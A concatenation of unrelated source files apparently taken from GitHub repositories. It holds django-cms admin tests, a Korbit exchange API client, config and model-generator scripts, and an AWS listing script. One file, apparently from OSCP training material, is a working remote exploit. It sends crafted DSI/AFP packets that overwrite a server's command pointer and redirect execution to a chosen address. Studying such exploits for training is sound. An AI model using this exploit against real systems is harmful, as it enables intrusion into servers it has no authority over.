clipboard_plugins = clipboard.get_plugins()
self.assertEqual(CMSPlugin.objects.count(), 5)
self.assertEqual(clipboard_plugins.count(), 1)
self.assertEqual(clipboard_plugins[0].plugin_type, "PlaceholderPlugin")
placeholder_plugin, _ = clipboard_plugins[0].get_plugin_instance()
ref_placeholder = placeholder_plugin.placeholder_ref
copied_plugins = ref_placeholder.get_plugins()
self.assertEqual(copied_plugins.count(), 2)
data = dict(source_plugin_id=placeholder_plugin.pk,
source_placeholder_id=clipboard.pk,
source_language='en',
target_language='fr',
target_placeholder_id=self._placeholder.pk,
)
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponse.status_code)
plugins = self._placeholder.get_plugins()
self.assertEqual(plugins.count(), 4)
self.assertEqual(CMSPlugin.objects.count(), 7)
self.assertEqual(Placeholder.objects.count(), 4)
url = admin_reverse('cms_page_clear_placeholder', args=[clipboard.pk])
with self.assertNumQueries(FuzzyInt(70, 90)):
response = self.client.post(url, {'test': 0})
self.assertEqual(response.status_code, 302)
self.assertEqual(CMSPlugin.objects.count(), 4)
self.assertEqual(Placeholder.objects.count(), 3)
def test_plugins_copy_language(self):
"""User tries to copy plugin but has no permissions. He can copy plugins after he got the permissions"""
self._create_plugin()
_, normal_guy = self._get_guys()
if get_user_model().USERNAME_FIELD != 'email':
self.client.login(username='test', password='test')
else:
self.client.login(username='[email protected]', password='[email protected]')
self.assertEqual(1, CMSPlugin.objects.all().count())
url = admin_reverse('cms_page_copy_language', args=[self._page.pk])
data = dict(
source_language='en',
target_language='fr',
)
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponseForbidden.status_code)
# After he got the permissions, he can edit the plugin
self._give_permission(normal_guy, Text, 'add')
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponse.status_code)
self.assertEqual(2, CMSPlugin.objects.all().count())
def test_page_permission_inline_visibility(self):
User = get_user_model()
fields = dict(email='[email protected]', password='user', is_staff=True)
if get_user_model().USERNAME_FIELD != 'email':
fields[get_user_model().USERNAME_FIELD] = 'user'
user = User(**fields)
user.save()
self._give_page_permission_rights(user)
page = create_page('A', 'nav_playground.html', 'en')
page_permission = PagePermission.objects.create(
can_change_permissions=True, user=user, page=page)
request = self._get_change_page_request(user, page)
page_admin = PageAdmin(Page, AdminSite())
page_admin._current_page = page
# user has can_change_permission
# => must see the PagePermissionInline
self.assertTrue(
any(type(inline) is PagePermissionInlineAdmin
for inline in page_admin.get_inline_instances(request, page)))
page = Page.objects.get(pk=page.pk)
# remove can_change_permission
page_permission.can_change_permissions = False
page_permission.save()
request = self._get_change_page_request(user, page)
page_admin = PageAdmin(Page, AdminSite())
page_admin._current_page = page
# => PagePermissionInline is no longer visible
self.assertFalse(
any(type(inline) is PagePermissionInlineAdmin
for inline in page_admin.get_inline_instances(request, page)))
def test_edit_title_is_allowed_for_staff_user(self):
"""
We check here both the permission on a single page, and the global permissions
"""
user = self._create_user('user', is_staff=True)
another_user = self._create_user('another_user', is_staff=True)
page = create_page('A', 'nav_playground.html', 'en')
admin_url = reverse("admin:cms_page_edit_title_fields", args=(
page.pk, 'en'
))
page_admin = PageAdmin(Page, None)
page_admin._current_page = page
username = getattr(user, get_user_model().USERNAME_FIELD)
self.client.login(username=username, password=username)
response = self.client.get(admin_url)
self.assertEqual(response.status_code, HttpResponseForbidden.status_code)
assign_user_to_page(page, user, grant_all=True)
username = getattr(user, get_user_model().USERNAME_FIELD)
self.client.login(username=username, password=username)
response = self.client.get(admin_url)
self.assertEqual(response.status_code, HttpResponse.status_code)
self._give_cms_permissions(another_user)
username = getattr(another_user, get_user_model().USERNAME_FIELD)
self.client.login(username=username, password=username)
response = self.client.get(admin_url)
self.assertEqual(response.status_code, HttpResponse.status_code)
def test_plugin_add_returns_valid_pk_for_plugin(self):
admin_user = self._get_admin()
self._give_cms_permissions(admin_user)
self._give_permission(admin_user, Text, 'add')
username = getattr(admin_user, get_user_model().USERNAME_FIELD)
self.client.login(username=username, password='admin')
url = admin_reverse('cms_page_add_plugin')
data = {
'plugin_type': 'TextPlugin',
'placeholder_id': self._placeholder.pk,
'plugin_language': 'en',
'plugin_parent': '',
}
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponse.status_code)
self.assertEqual(response['content-type'], 'application/json')
pk = response.content.decode('utf8').split("edit-plugin/")[1].split("/")[0]
self.assertTrue(CMSPlugin.objects.filter(pk=int(pk)).exists())
class AdminFormsTests(AdminTestsBase):
def test_clean_overwrite_url(self):
user = AnonymousUser()
user.is_superuser = True
user.pk = 1
request = type('Request', (object,), {'user': user})
with self.settings():
data = {
'title': 'TestPage',
'slug': 'test-page',
'language': 'en',
'overwrite_url': '/overwrite/url/',
'site': Site.objects.get_current().pk,
'template': get_cms_setting('TEMPLATES')[0][0],
'published': True
}
form = PageForm(data)
self.assertTrue(form.is_valid(), form.errors.as_text())
instance = form.save()
instance.permission_user_cache = user
instance.permission_advanced_settings_cache = True
Title.objects.set_or_create(request, instance, form, 'en')
form = PageForm(data, instance=instance)
self.assertTrue(form.is_valid(), form.errors.as_text())
def test_missmatching_site_parent_dotsite(self):
site0 = Site.objects.create(domain='foo.com', name='foo.com')
site1 = Site.objects.create(domain='foo2.com', name='foo.com')
parent_page = Page.objects.create(
template='nav_playground.html',
site=site0)
new_page_data = {
'title': 'Title',
'slug': 'slug',
'language': 'en',
'site': site1.pk,
'template': get_cms_setting('TEMPLATES')[0][0],
'reverse_id': '',
'parent': parent_page.pk,
}
form = PageForm(data=new_page_data, files=None)
self.assertFalse(form.is_valid())
self.assertIn(u"Site doesn't match the parent's page site",
form.errors['__all__'])
def test_form_errors(self):
new_page_data = {
'title': 'Title',
'slug': 'home',
'language': 'en',
'site': 10,
'template': get_cms_setting('TEMPLATES')[0][0],
'reverse_id': '',
}
form = PageForm(data=new_page_data, files=None)
self.assertFalse(form.is_valid())
site0 = Site.objects.create(domain='foo.com', name='foo.com', pk=2)
page1 = api.create_page("test", get_cms_setting('TEMPLATES')[0][0], "fr", site=site0)
new_page_data = {
'title': 'Title',
'slug': 'home',
'language': 'en',
'site': 1,
'template': get_cms_setting('TEMPLATES')[0][0],
'reverse_id': '',
'parent': page1.pk,
}
form = PageForm(data=new_page_data, files=None)
self.assertFalse(form.is_valid())
new_page_data = {
'title': 'Title',
'slug': '#',
'language': 'en',
'site': 1,
'template': get_cms_setting('TEMPLATES')[0][0],
'reverse_id': '',
}
form = PageForm(data=new_page_data, files=None)
self.assertFalse(form.is_valid())
new_page_data = {
'title': 'Title',
'slug': 'home',
'language': 'pp',
'site': 1,
'template': get_cms_setting('TEMPLATES')[0][0],
'reverse_id': '',
'parent':'',
}
form = PageForm(data=new_page_data, files=None)
self.assertFalse(form.is_valid())
page2 = api.create_page("test", get_cms_setting('TEMPLATES')[0][0], "en")
new_page_data = {
'title': 'Title',
'slug': 'test',
'language': 'en',
'site': 1,
'template': get_cms_setting('TEMPLATES')[0][0],
'reverse_id': '',
'parent':'',
}
form = PageForm(data=new_page_data, files=None)
self.assertFalse(form.is_valid())
page3 = api.create_page("test", get_cms_setting('TEMPLATES')[0][0], "en", parent=page2)
page3.title_set.update(path="hello/")
page3 = page3.reload()
new_page_data = {
'title': 'Title',
'slug': 'test',
'language': 'en',
'site': 1,
'template': get_cms_setting('TEMPLATES')[0][0],
'reverse_id': '',
'parent':'',
}
form = PageForm(data=new_page_data, files=None, instance=page3)
self.assertFalse(form.is_valid())
def test_reverse_id_error_location(self):
''' Test moving the reverse_id validation error to a field specific one '''
# this is the Reverse ID we'll re-use to break things.
dupe_id = 'p1'
curren_site = Site.objects.get_current()
create_page('Page 1', 'nav_playground.html', 'en', reverse_id=dupe_id)
page2 = create_page('Page 2', 'nav_playground.html', 'en')
# Assemble a bunch of data to test the page form
page2_data = {
'language': 'en',
'site': curren_site.pk,
'reverse_id': dupe_id,
'template': 'col_two.html',
}
form = AdvancedSettingsForm(data=page2_data, files=None)
self.assertFalse(form.is_valid())
# reverse_id is the only item that is in __all__ as every other field
# has it's own clean method. Moving it to be a field error means
# __all__ is now not available.
self.assertNotIn('__all__', form.errors)
# In moving it to it's own field, it should be in form.errors, and
# the values contained therein should match these.
self.assertIn('reverse_id', form.errors)
self.assertEqual(1, len(form.errors['reverse_id']))
self.assertEqual([u'A page with this reverse URL id exists already.'],
form.errors['reverse_id'])
page2_data['reverse_id'] = ""
form = AdvancedSettingsForm(data=page2_data, files=None)
self.assertTrue(form.is_valid())
admin_user = self._get_guys(admin_only=True)
# reset some of page2_data so we can use cms.api.create_page
page2 = page2.reload()
page2.site = curren_site
page2.save()
with self.login_user_context(admin_user):
# re-reset the page2_data for the admin form instance.
page2_data['reverse_id'] = dupe_id
page2_data['site'] = curren_site.pk
# post to the admin change form for page 2, and test that the
# reverse_id form row has an errors class. Django's admin avoids
# collapsing these, so that the error is visible.
resp = self.client.post(base.URL_CMS_PAGE_ADVANCED_CHANGE % page2.pk, page2_data)
self.assertContains(resp, '<div class="form-row errors reverse_id">')
def test_create_page_type(self):
page = create_page('Test', 'static.html', 'en', published=True, reverse_id="home")
for placeholder in Placeholder.objects.all():
add_plugin(placeholder, TextPlugin, 'en', body='<b>Test</b>')
page.publish('en')
self.assertEqual(Page.objects.count(), 2)
self.assertEqual(CMSPlugin.objects.count(), 4)
superuser = self.get_superuser()
with self.login_user_context(superuser):
response = self.client.get(
"%s?copy_target=%s&language=%s" % (admin_reverse("cms_page_add_page_type"), page.pk, 'en'))
self.assertEqual(response.status_code, 302)
self.assertEqual(Page.objects.count(), 3)
self.assertEqual(Page.objects.filter(reverse_id="page_types").count(), 1)
page_types = Page.objects.get(reverse_id='page_types')
url = response.url if hasattr(response, 'url') else response['Location']
expected_url_params = QueryDict(
'target=%s&position=first-child&add_page_type=1©_target=%s&language=en' % (page_types.pk, page.pk))
response_url_params = QueryDict(urlparse(url).query)
self.assertDictEqual(expected_url_params, response_url_params)
response = self.client.get("%s?copy_target=%s&language=%s" % (
admin_reverse("cms_page_add_page_type"), page.pk, 'en'), follow=True)
self.assertEqual(response.status_code, 200)
# test no page types if no page types there
response = self.client.get(admin_reverse('cms_page_add'))
self.assertNotContains(response, "page_type")
# create out first page type
page_data = {
'title': 'type1', 'slug': 'type1', '_save': 1, 'template': 'static.html', 'site': 1,
'language': 'en'
}
response = self.client.post(
"%s?target=%s&position=first-child&add_page_type=1©_target=%s&language=en" % (
URL_CMS_PAGE_ADD, page_types.pk, page.pk
), data=page_data)
self.assertEqual(response.status_code, 302)
self.assertEqual(Page.objects.count(), 4)
self.assertEqual(CMSPlugin.objects.count(), 6)
response = self.client.get(admin_reverse('cms_page_add'))
self.assertContains(response, "page_type")
# no page types available if you use the copy_target
response = self.client.get("%s?copy_target=%s&language=en" % (admin_reverse('cms_page_add'), page.pk))
self.assertNotContains(response, "page_type")
def test_render_edit_mode(self):
from django.core.cache import cache
cache.clear()
create_page('Test', 'static.html', 'en', published=True)
for placeholder in Placeholder.objects.all():
add_plugin(placeholder, TextPlugin, 'en', body='<b>Test</b>')
user = self.get_superuser()
self.assertEqual(Placeholder.objects.all().count(), 4)
with self.login_user_context(user):
output = force_text(
self.client.get(
'/en/?%s' % get_cms_setting('CMS_TOOLBAR_URL__EDIT_ON')
).content
)
self.assertIn('<b>Test</b>', output)
self.assertEqual(Placeholder.objects.all().count(), 9)
self.assertEqual(StaticPlaceholder.objects.count(), 2)
for placeholder in Placeholder.objects.all():
add_plugin(placeholder, TextPlugin, 'en', body='<b>Test</b>')
output = force_text(
self.client.get(
'/en/?%s' % get_cms_setting('CMS_TOOLBAR_URL__EDIT_ON')
).content
)
self.assertIn('<b>Test</b>', output)
def test_tree_view_queries(self):
from django.core.cache import cache
cache.clear()
for i in range(10):
create_page('Test%s' % i, 'col_two.html', 'en', published=True)
for placeholder in Placeholder.objects.all():
add_plugin(placeholder, TextPlugin, 'en', body='<b>Test</b>')
user = self.get_superuser()
with self.login_user_context(user):
with self.assertNumQueries(FuzzyInt(18, 33)):
force_text(self.client.get(URL_CMS_PAGE))
def test_smart_link_published_pages(self):
admin, staff_guy = self._get_guys()
page_url = URL_CMS_PAGE_PUBLISHED # Not sure how to achieve this with reverse...
with self.login_user_context(staff_guy):
multi_title_page = create_page('main_title', 'col_two.html', 'en', published=True,
overwrite_url='overwritten_url',
menu_title='menu_title')
title = multi_title_page.get_title_obj()
title.page_title = 'page_title'
title.save()
multi_title_page.save()
publish_page(multi_title_page, admin, 'en')
# Non ajax call should return a 403 as this page shouldn't be accessed by anything else but ajax queries
self.assertEqual(403, self.client.get(page_url).status_code)
self.assertEqual(200,
self.client.get(page_url, HTTP_X_REQUESTED_WITH='XMLHttpRequest').status_code
)
# Test that the query param is working as expected.
self.assertEqual(1, len(json.loads(self.client.get(page_url, {'q':'main_title'},
HTTP_X_REQUESTED_WITH='XMLHttpRequest').content.decode("utf-8"))))
self.assertEqual(1, len(json.loads(self.client.get(page_url, {'q':'menu_title'},
HTTP_X_REQUESTED_WITH='XMLHttpRequest').content.decode("utf-8"))))
self.assertEqual(1, len(json.loads(self.client.get(page_url, {'q':'overwritten_url'},
HTTP_X_REQUESTED_WITH='XMLHttpRequest').content.decode("utf-8"))))
self.assertEqual(1, len(json.loads(self.client.get(page_url, {'q':'page_title'},
HTTP_X_REQUESTED_WITH='XMLHttpRequest').content.decode("utf-8"))))
class AdminPageEditContentSizeTests(AdminTestsBase):
"""
System user count influences the size of the page edit page,
but the users are only 2 times present on the page
The test relates to extra=0
at PagePermissionInlineAdminForm and ViewRestrictionInlineAdmin
"""
def test_editpage_contentsize(self):
"""
Expected a username only 2 times in the content, but a relationship
between usercount and pagesize
"""
with self.settings(CMS_PERMISSION=True):
admin_user = self.get_superuser()
PAGE_NAME = 'TestPage'
USER_NAME = 'test_size_user_0'
current_site = Site.objects.get(pk=1)
page = create_page(PAGE_NAME, "nav_playground.html", "en", site=current_site, created_by=admin_user)
page.save()
self._page = page
with self.login_user_context(admin_user):
url = base.URL_CMS_PAGE_PERMISSION_CHANGE % self._page.pk
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
old_response_size = len(response.content)
old_user_count = get_user_model().objects.count()
# create additionals user and reload the page
get_user_model().objects.create_user(username=USER_NAME, email=USER_NAME + '@django-cms.org',
password=USER_NAME)
user_count = get_user_model().objects.count()
more_users_in_db = old_user_count < user_count
# we have more users
self.assertTrue(more_users_in_db, "New users got NOT created")
response = self.client.get(url)
new_response_size = len(response.content)
page_size_grown = old_response_size < new_response_size
# expect that the pagesize gets influenced by the useramount of the system
self.assertTrue(page_size_grown, "Page size has not grown after user creation")
# usernames are only 2 times in content
text = smart_str(response.content, response.charset)
foundcount = text.count(USER_NAME)
# 2 forms contain usernames as options
self.assertEqual(foundcount, 2,
"Username %s appeared %s times in response.content, expected 2 times" % (
USER_NAME, foundcount))
| {
"content_hash": "18712b0c550b9a8d7ab6e5cda793ad1f",
"timestamp": "",
"source": "github",
"line_count": 1681,
"max_line_length": 129,
"avg_line_length": 45.616894705532424,
"alnum_prop": 0.5935812837432514,
"repo_name": "vxsx/django-cms",
"id": "2112f6db0ab0814bc6770199a24a13d98b3173cd",
"size": "76706",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "cms/tests/test_admin.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "133419"
},
{
"name": "HTML",
"bytes": "154109"
},
{
"name": "JavaScript",
"bytes": "1172445"
},
{
"name": "Python",
"bytes": "1996894"
},
{
"name": "Shell",
"bytes": "28"
}
],
"symlink_target": ""
} |
import socket
import struct
import sys
if len(sys.argv) != 3:
sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Attempting connection to " + ip + ":" + sys.argv[2]
sock.connect((ip, port))
dsi_payload = "\x00\x00\x40\x00" # client quantum
dsi_payload += '\x00\x00\x00\x00' # overwrites datasize
dsi_payload += struct.pack("I", 0xdeadbeef) # overwrites quantum
dsi_payload += struct.pack("I", 0xfeedface) # overwrites the ids
dsi_payload += struct.pack("Q", 0x63b660) # overwrite commands ptr
dsi_opensession = "\x01" # attention quantum option
dsi_opensession += struct.pack("B", len(dsi_payload)) # length
dsi_opensession += dsi_payload
dsi_header = "\x00" # "request" flag
dsi_header += "\x04" # open session command
dsi_header += "\x00\x01" # request id
dsi_header += "\x00\x00\x00\x00" # data offset
dsi_header += struct.pack(">I", len(dsi_opensession))
dsi_header += "\x00\x00\x00\x00" # reserved
dsi_header += dsi_opensession
sock.sendall(dsi_header)
resp = sock.recv(1024)
print "[+] Open Session complete"
afp_command = "\x01" # invoke the second entry in the table
afp_command += "\x00" # protocol defined padding
afp_command += "\x00\x00\x00\x00\x00\x00" # pad out the first entry
afp_command += struct.pack("Q", 0x4295f0) # address to jump to
dsi_header = "\x00" # "request" flag
dsi_header += "\x02" # "AFP" command
dsi_header += "\x00\x02" # request id
dsi_header += "\x00\x00\x00\x00" # data offset
dsi_header += struct.pack(">I", len(afp_command))
dsi_header += '\x00\x00\x00\x00' # reserved
dsi_header += afp_command
print "[+] Sending get server info request"
sock.sendall(dsi_header)
resp = sock.recv(1024)
print resp
print "[+] Fin."
| {
"content_hash": "539ddffca1bd7d7bdc9dab6a06621519",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 67,
"avg_line_length": 38.733333333333334,
"alnum_prop": 0.6855995410212278,
"repo_name": "cappetta/SecDevOps-Toolkit",
"id": "1c7938b80e9c4b8704923d26b30a3cc6215f32e3",
"size": "1743",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "training/oscp/exploit/test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1036"
},
{
"name": "Dockerfile",
"bytes": "1371"
},
{
"name": "Gherkin",
"bytes": "617"
},
{
"name": "HCL",
"bytes": "44766"
},
{
"name": "PHP",
"bytes": "80"
},
{
"name": "PowerShell",
"bytes": "15519"
},
{
"name": "Python",
"bytes": "47224"
},
{
"name": "Ruby",
"bytes": "14396"
},
{
"name": "Shell",
"bytes": "11885"
}
],
"symlink_target": ""
} |
import time
from .public_api import PublicAPI
class PrivateAPI(PublicAPI):
def __init__(self, client_id, secret, production=True, version="v1", timeout=20):
try:
super(self.__class__, self).__init__(production, version, timeout)
except TypeError:
PublicAPI.__init__(self, production, version, timeout)
self.__client_id = client_id
self.__secret = secret
self.__token = {}
# https://apidocs.korbit.co.kr/#authentication
def create_token_directly(self):
payload = {
'client_id': self.__client_id,
'client_secret': self.__secret,
'grant_type': "client_credentials"
}
self.__token = self.request_post("oauth2/access_token", data=payload)
return self.__token
def set_token(self, token):
self.__token = token
def refresh_token(self):
payload = {
'client_id': self.__client_id,
'client_secret': self.__secret,
'refresh_token': self.__token['refresh_token'],
'grant_type': "refresh_token"
}
self.__token = self.request_post("oauth2/access_token", data=payload)
return self.__token
def get_user_info(self):
return self.request_get("user/info", headers=self.headers)
@property
def headers(self):
return {
'Accept': 'application/json',
'Authorization': "{} {}".format(self.__token['token_type'], self.__token['access_token'])
}
# https://apidocs.korbit.co.kr/#exchange
def bid_order(self, bid_type, coin_amount=None, price=None, fiat_amount=None, currency_pair="btc_krw"):
payload = {
'type': bid_type,
'currency_pair': currency_pair,
'price': price,
'coin_amount': coin_amount,
'fiat_amount': fiat_amount,
'nonce': self.nonce
}
return self.request_post("user/orders/buy", headers=self.headers, data=payload)
def market_bid_order(self, fiat_amount, currency_pair="btc_krw"):
return self.bid_order('market', fiat_amount=fiat_amount, currency_pair=currency_pair)
def limit_bid_order(self, coin_amount, price, currency_pair="btc_krw"):
return self.bid_order('limit', coin_amount=coin_amount, price=price, currency_pair=currency_pair)
def ask_order(self, ask_type, coin_amount, price=None, currency_pair="btc_krw"):
payload = {
'type': ask_type,
'currency_pair': currency_pair,
'price': price,
'coin_amount': coin_amount,
'nonce': self.nonce
}
return self.request_post("user/orders/sell", headers=self.headers, data=payload)
def market_ask_order(self, coin_amount, currency_pair="btc_krw"):
return self.ask_order('market', coin_amount=coin_amount, currency_pair=currency_pair)
def limit_ask_order(self, coin_amount, price, currency_pair="btc_krw"):
return self.ask_order('limit', coin_amount, price, currency_pair)
def cancel_order(self, ids, currency_pair="btc_krw"):
payload = {
'id': ids,
'currency_pair': currency_pair,
'nonce': self.nonce
}
return self.request_post("user/orders/cancel", headers=self.headers, data=payload)
def list_open_orders(self, offset=0, limit=10, currency_pair="btc_krw"):
params = {
'currency_pair': currency_pair,
'offset': offset,
'limit': limit
}
return self.request_get("user/orders/open", headers=self.headers, params=params)
def view_exchange_orders(self, offset=0, limit=10, currency_pair="btc_krw"):
params = {
'currency_pair': currency_pair,
'offset': offset,
'limit': limit
}
return self.request_get("user/orders", headers=self.headers, params=params)
def view_transfers(self, offset=0, limit=10, currency="btc"):
params = {
'currency': currency,
'offset': offset,
'limit': limit
}
return self.request_get("user/transfers", headers=self.headers, params=params)
def trading_volume_and_fees(self, currency_pair="all"):
params = {
'currency_pair': currency_pair
}
return self.request_get("user/volume", headers=self.headers, params=params)
# https://apidocs.korbit.co.kr/#wallet
def user_balances(self):
return self.request_get("user/balances", headers=self.headers)
def user_accounts(self):
return self.request_get("user/accounts", headers=self.headers)
def retrieve_wallet_status(self, currency_pair="btc_krw"):
params = {
'currency_pair': currency_pair
}
return self.request_get("user/wallet", headers=self.headers, params=params)
def assign_btc_address(self, currency="btc"):
payload = {
'currency': currency,
'nonce': self.nonce
}
return self.request_post("user/coins/address/assign", headers=self.headers, data=payload)
def request_btc_withdrawal(self, address, amount, currency="btc"):
payload = {
'address': address,
'amount': amount,
'currency': currency,
'nonce': self.nonce
}
return self.request_post("user/coins/out", headers=self.headers, data=payload)
def status_of_btc_deposit_and_transfer(self, transfer_id="", currency="btc"):
params = {
'currency': currency
}
if transfer_id != "":
params['id'] = transfer_id
return self.request_get("user/coins/status", headers=self.headers, params=params)
def cancel_btc_transfer_request(self, transfer_id, currency="btc"):
payload = {
'id': transfer_id,
'currency': currency,
'nonce': self.nonce
}
return self.request_post("user/coins/out/cancel", headers=self.headers, data=payload)
@property
def nonce(self):
return int(time.time() * 1000)
| {
"content_hash": "f7c7674922908d0593883b262e244904",
"timestamp": "",
"source": "github",
"line_count": 168,
"max_line_length": 107,
"avg_line_length": 36.410714285714285,
"alnum_prop": 0.5883603073401994,
"repo_name": "HoonJin/korbit-python",
"id": "50b37a7c3f864dc2f5d2ad7929b7aa0ce4d70b72",
"size": "6141",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "korbit/private_api.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "10182"
}
],
"symlink_target": ""
} |
'''
fetch config from file/sql db
persist info to file/sql db
rotate fetching
log info, warnings, errors to file
single process
sql orm ? suitable for bulk inserts ? sqlalchemy ?
'''
# ----------------------------------------------------------------------
# load config from .ini file
from config import load_or_create_config
CONFIG_FILE_PATH = 'yfh.ini'
config = load_or_create_config(CONFIG_FILE_PATH)
if not config:
print('populate the config file settings and retry')
exit(1)
# ----------------------------------------------------------------------
from dal import postgresql, model
db_config = config['database']
credentials = model.Credential(
host=config['database']['host'],
user=config['database']['user'],
password=config['database']['password'],
database=config['database']['database']
)
new_cursor = postgresql.configure(credentials)
cursor = new_cursor()
| {
"content_hash": "0230120cb77639526066dbefde838b62",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 72,
"avg_line_length": 18.729166666666668,
"alnum_prop": 0.6040044493882091,
"repo_name": "davidbarkhuizen/yfh",
"id": "30dbd2c2d9d9e7fd57b0574ce31a2f67f296705a",
"size": "899",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "v2/daemon.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "24885"
}
],
"symlink_target": ""
} |
import os.path
import sys
from config import UserConfig
config = UserConfig()
BASEDIR = config.BASEDIR
WHITE_SPACE = config.WHITE_SPACE
SQLALCHEMY_MIGRATE_REPO = config.SQLALCHEMY_MIGRATE_REPO
from controller_generator import generate_controller
def add_model(model_name, model_components):
# This is used to add model to the model file.
# Get the current model file and open it for writing.
model_path = os.path.join(BASEDIR, "app/models/" + model_name.lower() + ".py")
init_path = os.path.join(BASEDIR, "app/models/__init__.py")
model_file = open(model_path, 'w')
# Write the class definition.
model_file.write('from app import db\n')
model_file.write('from helpers import json_date_format\n\n')
model_file.write('class ' + model_name.title() + '(db.Model):\n')
model_file.write(WHITE_SPACE+'id = db.Column(db.Integer, primary_key=True)\n')
## Add the model fields.
### First check for the data types and standardize it.
for component in model_components:
in_type = component['field_property'][0].lower()
### The database field type based on http://docs.sqlalchemy.org/en/rel_0_7/core/types.html#types-generic.
if in_type == 'biginteger' or in_type == 'bigint':
data_type = 'BigInteger'
elif in_type == 'binary':
data_type = 'Binary'
elif in_type == 'blob':
data_type = 'BLOB'
elif in_type == 'boolean':
data_type = 'Boolean'
elif in_type == 'date':
data_type = 'Date'
elif in_type == 'datetime':
data_type = 'DateTime'
elif in_type == 'enum':
data_type = 'Enum'
elif in_type == 'float':
data_type = 'Float'
elif in_type=='int' or in_type=='integer':
data_type = 'Integer'
elif in_type == 'interval':
data_type = 'Interval'
elif in_type == 'largebinary':
data_type = 'LargeBinary'
elif in_type == 'numeric':
data_type = 'Numeric'
elif in_type == 'pickletype':
data_type = 'PickleType'
elif in_type == 'schematype':
data_type = 'SchemaType'
elif in_type == 'smallinteger' or in_type == 'smallint':
data_type = 'SmallInteger'
elif in_type == 'string':
data_type = 'String'
elif in_type == 'text':
data_type = 'Text'
elif in_type == 'time':
data_type = 'Time'
elif in_type == 'unicode':
data_type = 'Unicode'
elif in_type == 'unicodetext':
data_type = 'UnicodeText'
else:
### If the data type did not match any of the existing data types, display error message and quit the program.
print 'Data type ' + component['field_property'][0] + ' not found. Please refer to SQLAlchemy documentation for valid data types.'
sys.exit()
### If it matches write the model fields into the model files.
if len(component['field_property']) == 2:
model_file.write(WHITE_SPACE + component['field_name'].lower() + ' = db.Column(db.' + data_type + '(' + component['field_property'][1] + '))\n')
else:
model_file.write(WHITE_SPACE + component['field_name'].lower() + ' = db.Column(db.' + data_type + ')\n')
model_file.write(WHITE_SPACE + 'created_on = db.Column(db.DateTime)\n')
model_file.write(WHITE_SPACE + 'last_updated_on = db.Column(db.DateTime)\n')
## Create the class method for data transfer object (dto) for JSON representation.
model_file.write('\n')
model_file.write(WHITE_SPACE + '# data transfer object to form JSON\n')
model_file.write(WHITE_SPACE + 'def dto(self):\n')
model_file.write(WHITE_SPACE + WHITE_SPACE + 'return dict(\n')
### Add the json component for all fields.
model_file.write(WHITE_SPACE+WHITE_SPACE+WHITE_SPACE+'id = self.id,\n')
for component in model_components:
model_file.write(WHITE_SPACE + WHITE_SPACE + WHITE_SPACE + component['field_name'].lower() + ' = self.' + component['field_name'].lower() + ',\n')
model_file.write(WHITE_SPACE+WHITE_SPACE+WHITE_SPACE+'created_on = json_date_format(self.created_on),\n')
model_file.write(WHITE_SPACE+WHITE_SPACE+WHITE_SPACE+'last_updated_on = json_date_format(self.last_updated_on))\n')
model_file.close()
init_file = open(init_path, 'a')
init_file.write("from "+ model_name.lower() + " import " + model_name.title()+"\n")
init_file.close()
print '\n'+model_name+' tree seed planted in the greenhouse\n'
if not os.path.exists(SQLALCHEMY_MIGRATE_REPO):
print "If you're done, please run yard shove to complete the database creation"
else:
print "If you're done, please run yard water to complete the database creation"
# end of file | {
"content_hash": "7afc342585d1fcfe05407a0313ba86c4",
"timestamp": "",
"source": "github",
"line_count": 117,
"max_line_length": 156,
"avg_line_length": 41.52136752136752,
"alnum_prop": 0.6105393165911898,
"repo_name": "femmerling/backyard",
"id": "0194d9da1510b31add39678c85aac87dd5c434f7",
"size": "4858",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "gardener/model_generator.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "135019"
}
],
"symlink_target": ""
} |
from cgnaws import *
import sys
with open("/root/.aws/config") as f:
for line in f.readlines():
if line.startswith('aws_access_key_id'):
aws_access_key_id = line.split()[-1]
elif line.startswith('aws_secret_access_key'):
aws_secret_access_key = line.split()[-1]
accounts = { 'bdoss' : { 'regions': ['us-east-1'], 'access-key' : aws_access_key_id, 'secret-key' : aws_secret_access_key} }
def main():
if len(sys.argv) != 1:
search_string = sys.argv[1]
else:
search_string = None
connections = establish_connections(accounts)
reservations = get_reservations(connections)
instances = get_instances(reservations)
print_instances_info(get_instances_info(instances),search_string)
if __name__ == '__main__':
main()
| {
"content_hash": "e89d76328b0767c574c526fd8b42c491",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 124,
"avg_line_length": 33.333333333333336,
"alnum_prop": 0.6275,
"repo_name": "stealthly/minotaur",
"id": "b318369d8f5c8578560d9331e6267e84c22fecd2",
"size": "1606",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "supervisor/scripts/cgnaws/awsinfo.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "13236"
},
{
"name": "Python",
"bytes": "84611"
},
{
"name": "Ruby",
"bytes": "163927"
},
{
"name": "Shell",
"bytes": "68285"
}
],
"symlink_target": ""
} |
import datetime
import json
from typing import Dict, Optional
import arrow
import flask
import requests
import yaml
from yaml.representer import Representer
from monitoring.monitorlib import infrastructure
TIMEOUTS = (5, 25) # Timeouts of `connect` and `read` in seconds
def coerce(obj: Dict, desired_type: type):
if isinstance(obj, desired_type):
return obj
else:
return desired_type(obj)
class RequestDescription(dict):
@property
def token(self) -> Dict:
return infrastructure.get_token_claims(self.get("headers", {}))
@property
